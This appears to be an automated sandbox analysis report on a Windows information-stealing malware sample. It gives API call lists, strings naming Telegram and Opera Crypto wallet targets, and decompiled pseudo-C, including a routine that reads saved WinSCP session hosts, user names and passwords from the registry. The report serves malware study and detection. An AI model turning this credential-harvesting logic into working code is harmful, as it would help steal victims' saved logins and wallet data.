lstrlen.KERNEL32(?,025C8188,025C8870,?,025C6B10,025C7308,?,025C6C28,025C6128,?,025C6BB0,025C6338,?,025C6A48,025C61D0,?), ref: 0041E7A3
_memset.LIBCMT ref: 0041E7CE

Strings

countries, xrefs: 0041E6CC
A6F891F2*, xrefs: 0041E53D, 0041E561
A7FDF864F, xrefs: 0041E4B9
Opera Crypto, xrefs: 0041DDCB
A92DAA6E, xrefs: 0041E57E
usertag, xrefs: 0041E773
settingss, xrefs: 0041E71C
Telegram, xrefs: 0041E374, 0041E393, 0041E414, 0041E4D9, 0041E59E, 0041E663, 0041E6C7, 0041E6FA, 0041E717, 0041E734, 0041E751, 0041E76E
prefix, xrefs: 0041E6FF
F8806DD0, xrefs: 0041E643
Opera Crypto Stable, xrefs: 0041DDC6
shortcuts-custom.json, xrefs: 0041E739
C461824F*, xrefs: 0041E602, 0041E626
shortcuts-default.json, xrefs: 0041E756
BC10B77*, xrefs: 0041E478, 0041E49C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$_strlen$Filewsprintf$Find$CloseCopyDeleteFirstFreeLibraryLockitLockit::_MatchNextOpenPathSpeclstrlenstd::_
String ID: A6F891F2*$A7FDF864F$A92DAA6E$BC10B77*$C461824F*$F8806DD0$Opera Crypto$Opera Crypto Stable$Telegram$countries$prefix$settingss$shortcuts-custom.json$shortcuts-default.json$usertag
API String ID: 1822859593-2082502457
Opcode ID: 6a70dfdf22a26a664a3605d9229faa1b85370f7a0d7378864561725d891b74ac
Instruction ID: 27a6b3332b52aec65e8b3bbe7409668b8b0224c21569ecac58754398ba81b119
Opcode Fuzzy Hash: 6a70dfdf22a26a664a3605d9229faa1b85370f7a0d7378864561725d891b74ac
Instruction Fuzzy Hash: F552D5B1A4021CAFDB54EF50EC85EEA7378AB89B05F04859EF10553141DB789B84CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F790 Relevance: 107.8, APIs: 59, Strings: 2, Instructions: 1094
stringsleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040F790(void* __eflags, void* __fp0) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				signed int _v20;
				void* _v280;
				char _v780;
				intOrPtr _v788;
				void* _v792;
				char _v808;
				void* _v816;
				void* _v820;
				void* _v836;
				void* _v844;
				void* _v848;
				void* _v864;
				void* _v872;
				void* _v876;
				void* _v892;
				void* _v900;
				void* _v904;
				void* _v920;
				void* _v928;
				void* _v932;
				void* _v948;
				void* _v956;
				void* _v960;
				void* _v976;
				void* _v984;
				void* _v988;
				void* _v1004;
				void* _v1012;
				void* _v1016;
				void* _v1032;
				void* _v1040;
				void* _v1044;
				void* _v1060;
				void* _v1068;
				void* _v1072;
				void* _v1088;
				void* _v1096;
				void* _v1100;
				void* _v1116;
				void* _v1124;
				void* _v1128;
				void* _v1144;
				void* _v1152;
				void* _v1156;
				void* _v1172;
				void* _v1180;
				void* _v1184;
				void* _v1200;
				void* _v1208;
				void* _v1212;
				void* _v1228;
				void* _v1236;
				void* _v1240;
				void* _v1256;
				void* _v1264;
				void* _v1268;
				void* _v1284;
				void* _v1292;
				void* _v1296;
				void* _v1312;
				intOrPtr _v1328;
				struct _SECURITY_ATTRIBUTES* _v1332;
				char _v1348;
				void* _v1356;
				void* _v1360;
				void* _v1376;
				void* _v1384;
				void* _v1388;
				void* _v1404;
				void* _v1412;
				void* _v1416;
				void* _v1432;
				void* _v1440;
				void* _v1444;
				void* _v1460;
				void* _v1468;
				void* _v1472;
				void* _v1488;
				void* _v1496;
				void* _v1500;
				void* _v1516;
				void* _v1524;
				void* _v1528;
				void* _v1544;
				void* _v1552;
				void* _v1556;
				void* _v1572;
				void* _v1580;
				void* _v1584;
				void* _v1600;
				void* _v1608;
				void* _v1612;
				void* _v1628;
				void* _v1636;
				void* _v1640;
				void* _v1656;
				void* _v1664;
				void* _v1668;
				void* _v1684;
				void* _v1692;
				void* _v1696;
				void* _v1712;
				void* _v1720;
				void* _v1724;
				void* _v1740;
				void* _v1748;
				void* _v1752;
				void* _v1768;
				void* _v1776;
				void* _v1780;
				void* _v1796;
				void* _v1800;
				void* _v2056;
				void* _v2096;
				char _v2097;
				char _v2098;
				void* _v2099;
				void* _v2100;
				void* _v2104;
				void* _v2108;
				void* _v2112;
				void* _v2116;
				void* _v2120;
				void* _v2124;
				void* _v2128;
				void* _v2153;
				void* _v2154;
				void* _v2155;
				void* _v2156;
				void* _v2157;
				void* _v2158;
				void* _v2159;
				void* _v2160;
				void* _v70519;
				void* __ebx;
				void* __edi;
				signed int _t427;
				signed int _t428;
				intOrPtr* _t434;
				intOrPtr* _t436;
				intOrPtr* _t438;
				void* _t440;
				void* _t443;
				struct _SECURITY_ATTRIBUTES* _t620;
				CHAR* _t629;
				signed int _t756;
				void* _t757;
				void* _t759;
				void* _t800;
				void* _t857;

				_t857 = __fp0;
				_push(0xffffffff);
				_push(E0043E86D);
				_push( *[fs:0x0]);
				_t427 =  *0x451f00; // 0xc21d6f0a
				_t428 = _t427 ^ _t756;
				_v20 = _t428;
				_push(_t428);
				 *[fs:0x0] =  &_v16;
				_t620 = 0;
				_v1328 = 0xf;
				_v1332 = 0;
				_v1348 = 0;
				_v8 = 0;
				E004018B0( &_v2098);
				E00424430();
				 *0x453c9c = 0xabe0;
				 *0x453ca8 = 0;
				 *0x453c94 = 0;
				E0042A2F0( &_v780, 0, 0x1f4);
				_t759 = _t757 - 0x860 + 0xc;
				_t434 = E0041F8E0( &_v2097,  &_v808); // executed
				_v8 = 1;
				if( *((intOrPtr*)(_t434 + 0x14)) >= 0x10) {
					_t434 =  *_t434;
				}
				 *0x464860( &_v780, _t434);
				_v8 = _t620;
				if(_v788 >= 0x10) {
					_push(_v808);
					E0042A289();
					_t759 = _t759 + 4;
				}
				_t436 = E0041F540(_t620, 0x10,  &_v808); // executed
				_v8 = 2;
				if( *((intOrPtr*)(_t436 + 0x14)) >= 0x10) {
					_t436 =  *_t436;
				}
				 *0x464860( &_v780, _t436);
				_v8 = _t620;
				_t796 = _v788 - 0x10;
				if(_v788 >= 0x10) {
					_push(_v808);
					E0042A289();
					_t759 = _t759 + 4;
				}
				_t438 = E0041F480(_t620, _t796,  &_v808); // executed
				_v8 = 3;
				if( *((intOrPtr*)(_t438 + 0x14)) >= 0x10) {
					_t438 =  *_t438;
				}
				 *0x464860( &_v780, _t438);
				_v8 = _t620;
				if(_v788 >= 0x10) {
					_push(_v808);
					E0042A289();
					_t759 = _t759 + 4;
				}
				_t629 =  &_v780;
				_t440 = OpenEventA(0x1f0003, _t620, _t629);
				 *0x453ca4 = _t440;
				if(_t440 == _t620) {
					L15:
					 *0x453ca4 = CreateEventA(_t620, _t620, _t620,  &_v780);
					if(_t800 != 0 && _t800 == 0) {
					}
					_t443 = E0040EF60(); // executed
					_push(_t620);
					_push(0x4a2cb71);
				} else {
					L13:
					_t440 = CloseHandle(_t440);
					Sleep(0x1388);
					_push( &_v780);
					_push(_t620);
					_push(0x1f0003);
					 *0x10 =  *0x10 + _t620;
					_t620 = _t620 + _t620;
					asm("adc eax, 0x4646c0");
					 *0x453ca4 = _t440;
					_t800 = _t440 - _t620;
					if(_t800 != 0) {
						goto L13;
					}
					goto L15;
				}
			}

0x0040f790
0x0040f793
0x0040f795
0x0040f7a0
0x0040f7a7
0x0040f7ac
0x0040f7ae
0x0040f7b4
0x0040f7b8
0x0040f7be
0x0040f7c5
0x0040f7cb
0x0040f7d1
0x0040f7dd
0x0040f7e0
0x0040f7e5
0x0040f7f7
0x0040f801
0x0040f807
0x0040f80d
0x0040f812
0x0040f822
0x0040f82c
0x0040f833
0x0040f835
0x0040f835
0x0040f83f
0x0040f845
0x0040f84e
0x0040f856
0x0040f857
0x0040f85c
0x0040f85c
0x0040f86c
0x0040f871
0x0040f878
0x0040f87a
0x0040f87a
0x0040f884
0x0040f88a
0x0040f88d
0x0040f893
0x0040f89b
0x0040f89c
0x0040f8a1
0x0040f8a1
0x0040f8b1
0x0040f8b6
0x0040f8bd
0x0040f8bf
0x0040f8bf
0x0040f8c9
0x0040f8cf
0x0040f8d8
0x0040f8e0
0x0040f8e1
0x0040f8e6
0x0040f8e6
0x0040f8e9
0x0040f8f6
0x0040f8fc
0x0040f903
0x0040f933
0x0040f943
0x0040f948
0x0040f948
0x0040f94d
0x0040f952
0x0040f953
0x0040f905
0x0040f905
0x0040f906
0x0040f911
0x0040f91d
0x0040f91e
0x0040f91f
0x0040f921
0x0040f923
0x0040f925
0x0040f92a
0x0040f92f
0x0040f931
0x00000000
0x00000000
0x00000000
0x0040f931

APIs

Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8AC8), ref: 00424445
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C7608), ref: 0042445D
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8CC0), ref: 00424476
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C6930), ref: 0042448E
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8D50), ref: 004244A6
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C7628), ref: 004244BF
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8BA0), ref: 004244D7
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8C30), ref: 004244EF
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8B88), ref: 00424508
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8A98), ref: 00424520
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8B10), ref: 00424538
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8AE0), ref: 00424551
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8C48), ref: 00424569
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C7648), ref: 00424581
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8B28), ref: 0042459A
Part of subcall function 00424430: GetProcAddress.KERNEL32(74CA0000,025C8B58), ref: 004245B2

_memset.LIBCMT ref: 0040F80D

Part of subcall function 0041F8E0: GetWindowsDirectoryA.KERNEL32(?,00000104,C21D6F0A,?,00000010,?), ref: 0041F94A
Part of subcall function 0041F8E0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000010,?), ref: 0041F98B
Part of subcall function 0041F8E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000010,?), ref: 0041F9F2
Part of subcall function 0041F8E0: HeapAlloc.KERNEL32(00000000,?,?,00000010,?), ref: 0041F9F9
Part of subcall function 0041F8E0: _strlen.LIBCMT ref: 0041FA17
Part of subcall function 0041F8E0: std::_Xinvalid_argument.LIBCPMT ref: 0041FA2B

lstrcat.KERNEL32(?,00000000), ref: 0040F83F
lstrcat.KERNEL32(?,00000000), ref: 0040F884
lstrcat.KERNEL32(?,00000000), ref: 0040F8C9
OpenEventA.KERNEL32(001F0003,00000000,?), ref: 0040F8F6
CloseHandle.KERNEL32(00000000), ref: 0040F906
Sleep.KERNEL32(00001388), ref: 0040F911
OpenEventA.KERNEL32(001F0003,00000000,?), ref: 0040F924
CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040F93D
_memset.LIBCMT ref: 0040F970
lstrcat.KERNEL32(?,025CA500), ref: 0040F992
lstrcat.KERNEL32(?,0044585C), ref: 0040F9A4
lstrcat.KERNEL32(?,6F646400), ref: 0040F9C4
GetProcessHeap.KERNEL32(00000000,?), ref: 0040FA35
RtlAllocateHeap.NTDLL(00000000), ref: 0040FA3C

Part of subcall function 00420760: _memset.LIBCMT ref: 00420792
Part of subcall function 00420760: GetDesktopWindow.USER32 ref: 004207C9
Part of subcall function 00420760: GetWindowRect.USER32(00000000,?), ref: 004207D6
Part of subcall function 00420760: SelectObject.GDI32(00000000,00000000), ref: 00420802

CreateThread.KERNEL32(00000000,00000000,Function_0000C480,?,00000000,00000000), ref: 0040FBCA
CreateThread.KERNEL32(00000000,00000000,Function_0000C480,?,00000000,00000000), ref: 0040FBFD
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 0040FC0A
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 0040FC25
_strlen.LIBCMT ref: 0040FC63
_strlen.LIBCMT ref: 0040FC97
_strlen.LIBCMT ref: 0040FCCB
_strlen.LIBCMT ref: 0040FCFF
_strlen.LIBCMT ref: 0040FD33
_strlen.LIBCMT ref: 0040FD67
_strlen.LIBCMT ref: 0040FD9B
_strlen.LIBCMT ref: 0040FDCF
_strlen.LIBCMT ref: 0040FE03
_strlen.LIBCMT ref: 0040FE37
_strlen.LIBCMT ref: 0040FE6B
_strlen.LIBCMT ref: 0040FE9F
_strlen.LIBCMT ref: 0040FED3
_strlen.LIBCMT ref: 0040FF07
_strlen.LIBCMT ref: 0040FF3B
_strlen.LIBCMT ref: 0040FF6F
_strlen.LIBCMT ref: 0040FFA3
_strlen.LIBCMT ref: 0040FFD7
_memset.LIBCMT ref: 0041075E
lstrcat.KERNEL32(?,00445A50), ref: 00410772
lstrcat.KERNEL32(?,00445A4C), ref: 00410784
lstrcat.KERNEL32(?,00445A48), ref: 00410796
lstrcat.KERNEL32(?,00445A44), ref: 004107A8
lstrcat.KERNEL32(?,00445A64), ref: 004107BA
lstrcat.KERNEL32(?,00445A40), ref: 004107CC
lstrcat.KERNEL32(?,00445A3C), ref: 004107DE
lstrcat.KERNEL32(?,00445A44), ref: 004107F0
lstrcat.KERNEL32(?,00445A84), ref: 00410802
lstrcat.KERNEL32(?,00445A40), ref: 00410814
lstrcat.KERNEL32(?,00445A64), ref: 00410826
lstrcat.KERNEL32(?,00445A78), ref: 00410838
lstrcat.KERNEL32(?,004456B0), ref: 0041084A
lstrcat.KERNEL32(?,00445A38), ref: 0041085C
lstrcat.KERNEL32(?,00445A40), ref: 0041086E
lstrcat.KERNEL32(?,00445A34), ref: 00410880
_strlen.LIBCMT ref: 0041088D
CreateThread.KERNEL32(00000000,00000000,Function_0000C480,?,00000000,00000000), ref: 004108B7
Sleep.KERNEL32(0000EA60,?,?,?,?), ref: 004108C2
_memset.LIBCMT ref: 004108D7
_memset.LIBCMT ref: 004108FA

Strings

.exe, xrefs: 0040FC4C, 0040FC6C
&, xrefs: 0041019C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_strlen$AddressProc$_memset$CreateHeapSleep$EventThread$OpenProcessWindow$AllocAllocateCloseDesktopDirectoryHandleInformationObjectRectSelectVolumeWindowsXinvalid_argumentstd::_
String ID: &$.exe
API String ID: 523498822-2159638947
Opcode ID: d37c9a40c50adb8188fa8d18f3dd87d50716bd5c4a977c3f593c87825b364915
Instruction ID: a491f510ae15498be5e274c19959581f513b33982df2fe496279e2bac0bc75ef
Opcode Fuzzy Hash: d37c9a40c50adb8188fa8d18f3dd87d50716bd5c4a977c3f593c87825b364915
Instruction Fuzzy Hash: CEA28EF1D00268EBDB21DB559C81BDEB7B8AB45704F0441EEE10873242DB795B84CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A760 Relevance: 80.9, APIs: 44, Strings: 2, Instructions: 356stringmemoryfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,025C6600,C21D6F0A,?,00000000,00000000), ref: 0041A7B9
StrCmpCA.SHLWAPI(00000000,025C6620), ref: 0041A7D2
_memset.LIBCMT ref: 0041A807
lstrcat.KERNEL32(?,025C13D0), ref: 0041A81D
lstrcat.KERNEL32(?,00000000), ref: 0041A838
CopyFileA.KERNEL32(?,?,00000001), ref: 0041A848
_memset.LIBCMT ref: 0041A85C
lstrcat.KERNEL32(?,00443C68), ref: 0041A870
lstrcat.KERNEL32(?,025C6450), ref: 0041A884
lstrcat.KERNEL32(?,00443C68), ref: 0041A896
lstrcat.KERNEL32(?,00000000), ref: 0041A8A4
lstrcat.KERNEL32(?,00445E84), ref: 0041A8B6
lstrcat.KERNEL32(?,?), ref: 0041A8C4
lstrcat.KERNEL32(?,.txt), ref: 0041A8D6
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041A92A
RtlAllocateHeap.NTDLL(00000000), ref: 0041A931
StrCmpCA.SHLWAPI(00000000,00445694), ref: 0041A9D1
_memset.LIBCMT ref: 0041A9E0
_memset.LIBCMT ref: 0041A9F1
lstrcat.KERNEL32(00000000,025C6610), ref: 0041AA01
StrCmpCA.SHLWAPI(00000000,00445694), ref: 0041AA0D
_memset.LIBCMT ref: 0041AA1C
_memset.LIBCMT ref: 0041AA2C

Part of subcall function 0041A2B0: _memcmp.LIBCMT ref: 0041A302
Part of subcall function 0041A2B0: _memset.LIBCMT ref: 0041A32B
Part of subcall function 0041A2B0: LocalAlloc.KERNEL32(00000040,?), ref: 0041A365

lstrcat.KERNEL32(00000000,025C6610), ref: 0041AA3C
_memset.LIBCMT ref: 0041AA4C
lstrcat.KERNEL32(00000000,00445694), ref: 0041AA5A
lstrcat.KERNEL32(?,?), ref: 0041AA6E
lstrcat.KERNEL32(?,00445E70), ref: 0041AA80
lstrcat.KERNEL32(?,00000000), ref: 0041AA8E
lstrcat.KERNEL32(?,00445E70), ref: 0041AAA0
lstrcat.KERNEL32(?,?), ref: 0041AAB4
lstrcat.KERNEL32(?,00445E70), ref: 0041AAC6
lstrcat.KERNEL32(?,00000000), ref: 0041AAD4
lstrcat.KERNEL32(?,00445E70), ref: 0041AAE6
lstrcat.KERNEL32(?,00000000), ref: 0041AAF4
lstrcat.KERNEL32(?,00445E70), ref: 0041AB06
lstrcat.KERNEL32(?,?), ref: 0041AB1A
lstrcat.KERNEL32(?,00445E70), ref: 0041AB2C
lstrcat.KERNEL32(?,00000000), ref: 0041AB8E
lstrcat.KERNEL32(?,00443C5C), ref: 0041ABD5
lstrlen.KERNEL32(?), ref: 0041ABFB
_memset.LIBCMT ref: 0041AC27
DeleteFileA.KERNEL32(?), ref: 0041AC53

Strings

.txt, xrefs: 0041A8CA
ZHaZea, xrefs: 0041A944, 0041ABE2

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeap$AllocAllocateCopyDeleteLocalProcess_memcmplstrlen
String ID: .txt$ZHaZea
API String ID: 675897860-3089687261
Opcode ID: 91ea660ba840e1c98e76baeb9070b2ee3d30421c08b9be150430a2c5b7c8bf7d
Instruction ID: 6d6393734cd3ef97329d2d3c02ceb21f46bf5473275fae3fcccf2ce361bc52b9
Opcode Fuzzy Hash: 91ea660ba840e1c98e76baeb9070b2ee3d30421c08b9be150430a2c5b7c8bf7d
Instruction Fuzzy Hash: FCD183B5A00318ABCB50FFA4EC4DF9A7778EB89702F104599F505A3251E7789B80CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAF0 Relevance: 73.9, APIs: 39, Strings: 3, Instructions: 437
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0041BAF0(intOrPtr __ecx, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				char _v1303;
				char _v1304;
				char _v2327;
				char _v2328;
				char _v3351;
				char _v3352;
				intOrPtr _v3360;
				int* _v3364;
				char _v3380;
				intOrPtr _v3388;
				int* _v3392;
				char _v3408;
				intOrPtr _v3416;
				int* _v3420;
				char _v3436;
				intOrPtr _v3444;
				int* _v3448;
				char _v3464;
				intOrPtr _v3472;
				int* _v3476;
				short _v3492;
				intOrPtr _v3500;
				int* _v3504;
				char _v3520;
				void* _v3524;
				char _v3525;
				char _v3526;
				int _v3532;
				int* _v3536;
				intOrPtr _v3540;
				char _v3544;
				char _v3548;
				char _v3552;
				char _v3556;
				char _v3560;
				char _v3564;
				char _v3568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t139;
				signed int _t140;
				intOrPtr _t154;
				intOrPtr _t157;
				void* _t158;
				intOrPtr* _t162;
				void* _t165;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t177;
				void* _t178;
				intOrPtr _t181;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t190;
				void* _t192;
				int _t195;
				void* _t204;
				char* _t206;
				intOrPtr* _t211;
				void* _t224;
				intOrPtr* _t238;
				intOrPtr _t267;
				void* _t282;
				intOrPtr* _t285;
				long _t290;
				intOrPtr _t293;
				void* _t294;
				signed int _t295;
				void* _t296;
				void* _t299;
				void* _t301;

				_push(0xffffffff);
				_push(E0043F0FD);
				_push( *[fs:0x0]);
				_t139 =  *0x451f00; // 0xc21d6f0a
				_t140 = _t139 ^ _t295;
				_v20 = _t140;
				_push(_t140);
				 *[fs:0x0] =  &_v16;
				_t293 = _a4;
				_v3540 = __ecx;
				_v3536 = 0;
				_v280 = 0;
				E0042A2F0( &_v279, 0, 0x103);
				_v3532 = 0x104;
				_v3352 = 0;
				E0042A2F0( &_v3351, 0, 0x3ff);
				_v2328 = 0;
				E0042A2F0( &_v2327, 0, 0x3ff);
				_v1304 = 0;
				E0042A2F0( &_v1303, 0, 0x3ff);
				E0042A2F0( &_v3352, 0, 0x400);
				_t261 =  &_v2328;
				E0042A2F0( &_v2328, 0, 0x400);
				E0042A2F0( &_v1304, 0, 0x400);
				_t299 = _t296 - 0xde0 + 0x54;
				_v3556 = 0x400;
				_v3548 = 0x400;
				_v3552 = 0x400;
				_t152 = RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1,  &_v3524); // executed
				if(_t152 != 0) {
					L38:
					 *[fs:0x0] = _v16;
					_pop(_t282);
					_pop(_t294);
					_pop(_t224);
					return E0042A36A(_t152, _t224, _v20 ^ _t295, _t261, _t282, _t294);
				} else {
					_t154 =  *0x4539a0; // 0x25c9868
					_v3444 = 0xf;
					_v3448 = 0;
					_v3464 = 0;
					E00404BC0( &_v3464, _t154, E0042BC70(_t154));
					_t157 =  *0x453b7c; // 0x25c9c70
					_v8 = 0;
					_v3388 = 0xf;
					_v3392 = 0;
					_v3408 = 0;
					_t158 = E0042BC70(_t157);
					_t301 = _t299 + 8;
					E00404BC0( &_v3408, _t157, _t158);
					_v8 = 1;
					_t285 = E00423960( &_v3525,  &_v3436,  &_v3464);
					_v8 = 2;
					_t162 = E00423960( &_v3525,  &_v3492,  &_v3408);
					_v8 = 3;
					if( *((intOrPtr*)(_t285 + 0x14)) < 8) {
						_t238 = _t285;
					} else {
						_t238 =  *_t285;
					}
					if( *((intOrPtr*)(_t162 + 0x14)) >= 8) {
						_t162 =  *_t162;
					}
					_v3526 =  *0x4646a8(_v3524, _t162, _t238, 0x10, 0,  &_v3544,  &_v3568) != 0;
					if(_v3472 >= 8) {
						_push(_v3492);
						E0042A289();
						_t301 = _t301 + 4;
					}
					_t261 = 0;
					_v3472 = 7;
					_v3476 = 0;
					_v3492 = 0;
					if(_v3416 >= 8) {
						_push(_v3436);
						E0042A289();
						_t301 = _t301 + 4;
					}
					_v3416 = 7;
					_v3420 = 0;
					_v3436 = 0;
					if(_v3388 >= 0x10) {
						_t261 = _v3408;
						_push(_v3408);
						E0042A289();
						_t301 = _t301 + 4;
					}
					_v3388 = 0xf;
					_v3392 = 0;
					_v3408 = 0;
					_v8 = 0xffffffff;
					if(_v3444 >= 0x10) {
						_push(_v3464);
						E0042A289();
						_t301 = _t301 + 4;
					}
					_t165 = _v3524;
					if(_v3526 == 0) {
						L17:
						if(_t165 != 0) {
							RegCloseKey(_t165);
							_v3524 = 0;
						}
						goto L19;
					} else {
						if(_t165 == 0) {
							L19:
							if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9,  &_v3524) != 0) {
								goto L38;
							}
							_t261 =  &_v3532;
							if(RegEnumKeyExA(_v3524, 0,  &_v280,  &_v3532, 0, 0, 0, 0) != 0) {
								L36:
								_t152 = _v3524;
								if(_t152 != 0) {
									_t152 = RegCloseKey(_t152);
								}
								goto L38;
							} else {
								goto L21;
							}
							do {
								L21:
								 *0x464860(_t293, "\n");
								_t267 =  *0x453518; // 0x25c9cd0
								 *0x464860(_t293, _t267);
								 *0x464860(_t293, "\n");
								_t171 =  *0x453ac0; // 0x25c8880
								 *0x464860(_t293, _t171);
								_t173 =  *0x453478; // 0x25c9e50
								 *0x464748(_v3524,  &_v280, _t173, 2, 0,  &_v3352,  &_v3556);
								 *0x464860(_t293,  &_v3352);
								_t177 =  *0x4535dc; // 0x25c9dd8
								_v3564 = 4;
								_t178 =  *0x464748(_v3524,  &_v280, _t177, 0xffff, 0,  &_v3560,  &_v3564);
								_t316 = _t178;
								if(_t178 != 0) {
									 *0x464860(_t293, ":22");
								} else {
									_t211 = E00423BF0(4, _t316,  &_v3436, _v3560);
									_v8 = 4;
									if( *((intOrPtr*)(_t211 + 0x14)) >= 0x10) {
										_t211 =  *_t211;
									}
									 *0x464860(_t293, _t211);
									_v8 = 0xffffffff;
									if(_v3416 >= 0x10) {
										_push(_v3436);
										E0042A289();
										_t301 = _t301 + 4;
									}
								}
								 *0x464860(_t293, "\n");
								_t181 =  *0x453578; // 0x25c8690
								 *0x464860(_t293, _t181);
								_t183 =  *0x453b44; // 0x25c9e20
								 *0x464748(_v3524,  &_v280, _t183, 2, 0,  &_v2328,  &_v3548);
								 *0x464860(_t293,  &_v2328);
								_v3360 = 0xf;
								_v3364 = 0;
								_v3380 = 0;
								_t187 =  *0x45370c; // 0x25c9c40
								_v8 = 5;
								 *0x464748(_v3524,  &_v280, _t187, 2, 0,  &_v1304,  &_v3552);
								 *0x464860(_t293, "\n");
								_t190 =  *0x453a7c; // 0x25c9270
								 *0x464860(_t293, _t190);
								_t192 =  *0x464890( &_v1304, 0x443c1c);
								_t319 = _t192;
								if(_t192 != 0) {
									_t204 = E0041B420(_v3540, _t319,  &_v3520,  &_v3352,  &_v2328,  &_v1304);
									_v8 = 6;
									E00404D00( &_v3380, _t204);
									_v8 = 5;
									if(_v3500 >= 0x10) {
										_push(_v3520);
										E0042A289();
										_t301 = _t301 + 4;
									}
									_t206 = _v3380;
									_v3500 = 0xf;
									_v3504 = 0;
									_v3520 = 0;
									if(_v3360 < 0x10) {
										_t206 =  &_v3380;
									}
									 *0x464860(_t293, _t206);
								}
								 *0x464860(_t293, "\n\n");
								_t195 =  &(_v3536[0]);
								_v3536 = _t195;
								_v3532 = 0x104;
								_t290 = RegEnumKeyExA(_v3524, _t195,  &_v280,  &_v3532, 0, 0, 0, 0);
								E0042A2F0( &_v2328, 0, 0);
								_t261 =  &_v3380;
								E0042A2F0( &_v3380, 0, 0);
								E0042A2F0( &_v1304, 0, 0);
								_t301 = _t301 + 0x24;
								_v8 = 0xffffffff;
								if(_v3360 >= 0x10) {
									_push(_v3380);
									E0042A289();
									_t301 = _t301 + 4;
								}
								_v3360 = 0xf;
								_v3364 = 0;
								_v3380 = 0;
							} while (_t290 != 0x103);
							goto L36;
						}
						RegCloseKey(_t165);
						_t165 = 0;
						_v3524 = 0;
						goto L17;
					}
				}
			}

0x0041baf3
0x0041baf5
0x0041bb00
0x0041bb07
0x0041bb0c
0x0041bb0e
0x0041bb14
0x0041bb18
0x0041bb1e
0x0041bb30
0x0041bb36
0x0041bb3c
0x0041bb42
0x0041bb54
0x0041bb5e
0x0041bb64
0x0041bb76
0x0041bb7c
0x0041bb8e
0x0041bb94
0x0041bba7
0x0041bbad
0x0041bbb5
0x0041bbc6
0x0041bbcb
0x0041bbe2
0x0041bbe8
0x0041bbee
0x0041bbf4
0x0041bbfc
0x0041c135
0x0041c138
0x0041c140
0x0041c141
0x0041c142
0x0041c150
0x0041bc02
0x0041bc02
0x0041bc0a
0x0041bc14
0x0041bc1a
0x0041bc30
0x0041bc35
0x0041bc3b
0x0041bc40
0x0041bc4a
0x0041bc50
0x0041bc56
0x0041bc5b
0x0041bc66
0x0041bc7f
0x0041bc88
0x0041bc9e
0x0041bca2
0x0041bcac
0x0041bcb3
0x0041bcb9
0x0041bcb5
0x0041bcb5
0x0041bcb5
0x0041bcbe
0x0041bcc0
0x0041bcc0
0x0041bce9
0x0041bcf6
0x0041bcfe
0x0041bcff
0x0041bd04
0x0041bd04
0x0041bd07
0x0041bd09
0x0041bd13
0x0041bd19
0x0041bd26
0x0041bd2e
0x0041bd2f
0x0041bd34
0x0041bd34
0x0041bd3e
0x0041bd48
0x0041bd4e
0x0041bd5b
0x0041bd5d
0x0041bd63
0x0041bd64
0x0041bd69
0x0041bd69
0x0041bd6c
0x0041bd76
0x0041bd7c
0x0041bd82
0x0041bd8f
0x0041bd97
0x0041bd98
0x0041bd9d
0x0041bd9d
0x0041bda0
0x0041bdac
0x0041bdc1
0x0041bdc3
0x0041bdc6
0x0041bdcc
0x0041bdcc
0x00000000
0x0041bdae
